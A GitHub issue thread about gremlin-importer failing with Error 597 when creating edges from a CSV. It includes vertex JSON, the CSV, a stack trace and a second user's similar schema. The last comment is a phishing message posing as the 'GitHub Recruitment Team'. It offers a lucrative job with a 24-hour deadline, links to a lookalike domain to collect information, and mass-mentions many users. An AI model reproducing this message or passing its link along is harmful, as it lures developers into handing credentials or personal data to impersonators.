### ISSUE TITLE
Not able to create the Edges

### ISSUE THREAD

**Issue by mandaliyapraful** [mastayoda/gremlin-importer#4]
We have the vertices created with id =1 & 64  
**_vertices_**
   {
                "id": 0,
                "label": "villain",
                "type": "vertex",
                "properties": {
                    "siblings": [
                        {
                            "id": 8,
                            "value": 5
                        }
                    ],
                    "born_place": [
                        {
                            "id": 46,
                            "value": "Roma"
                        }
                    ],
                    "name": [
                        {
                            "id": 50,
                            "value": "A-Bomb (HAS)"
                        }
                    ],
                    "rank": [
                        {
                            "id": 53,
                            "value": 5
                        }
                    ],
                    "id": [
                        {
                            "id": 58,
                            "value": 2
                        }
                    ],
                    "salary": [
                        {
                            "id": 62,
                            "value": 7.6
                        }
                    ],
                    "first_battle": [
                        {
                            "id": 63,
                            "value": "2004-04-02T18:30:00.000Z"
                        }
                    ]
                }
            },
            {
                "id": 64,
                "label": "hero",
                "type": "vertex",
                "properties": {
                    "siblings": [
                        {
                            "id": 65,
                            "value": 4
                        }
                    ],
                    "born_place": [
                        {
                            "id": 67,
                            "value": "Fundão"
                        }
                    ],
                    "name": [
                        {
                            "id": 69,
                            "value": "Adam Destine"
                        }
                    ],
                    "rank": [
                        {
                            "id": 71,
                            "value": 4
                        }
                    ],
                    "id": [
                        {
                            "id": 74,
                            "value": 10
                        }
                    ],
                    "salary": [
                        {
                            "id": 75,
                            "value": 4.73
                        }
                    ],
                    "first_battle": [
                        {
                            "id": 77,
                            "value": "1960-01-09T18:30:00.000Z"
                        }
                    ]
                }
            },

Below is the CSv which we are using to create the edges.
**CSV**
id, numeric, 1
id, numeric, 64
in,worked,hours, numeric, 5, date, date, 4/07/2018

**ERROR**
$ gremlin-importer -h localhost -p 8182 -f csv -t e edge.csv
Computing line count...
Total lines in file: 3

597
  importing [========================================] 100% 0.0s
Error: null (Error 597)
    at GremlinClient.handleProtocolMessage (C:\Users\AppData\Roaming\npm\node_modules\gremlin-importer\node_modules\gremlin\lib\GremlinClient.js:183:37)
    at WebSocketGremlinConnection.connection.on.message (C:\Users\AppData\Roaming\npm\node_modules\gremlin-importer\node_modules\gremlin\lib\GremlinClient.js:108:46)
    at emitOne (events.js:96:13)
    at WebSocketGremlinConnection.emit (events.js:188:7)
    at WebSocketGremlinConnection.handleMessage (C:\Users\AppData\Roaming\npm\node_modules\gremlin-importer\node_modules\gremlin\lib\WebSocketGremlinConnection.js:45:10)
    at WebSocketGremlinConnection.ws.onmessage.message (C:\Users\AppData\Roaming\npm\node_modules\gremlin-importer\node_modules\gremlin\lib\WebSocketGremlinConnection.js:30:41)
    at WebSocket.onMessage (C:\Users\AppData\Roaming\npm\node_modules\gremlin-importer\node_modules\ws\lib\EventTarget.js:103:16)
    at emitTwo (events.js:106:13)
    at WebSocket.emit (events.js:191:7)
    at Receiver._receiver.onmessage (C:\Users\AppData\Roaming\npm\node_modules\gremlin-importer\node_modules\ws\lib\WebSocket.js:146:54)
{ _0_: 1, _1_: 64, _2_: 5, _3_: 2018-04-06T18:30:00.000Z }

**Comment by winsomeglint** [comment]
Bump because I'm having the same issue for the following schema:

id,firstName,lastName,gender,birthday,creationDate,locationIP,browserUsed
numeric,string,label,string,string,string,string,string
933,Mahinda,Perera,male,1989-12-03,2010-02-14T15:32:10.447+0000,119.235.7.103,Firefox

**Comment by byronic-azure** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
xussr, @Sai, @lcatro, @iKoala, @browngres, @clarklee186, @ambaloo, @wujun, @xu10000, @atyenoria, @merin83, @vaad2, @loaf, @Visgean, @seanlai, @Nipol, @trustfarm-dev, @nntaoli, @rjl493456442, @pablovanegas
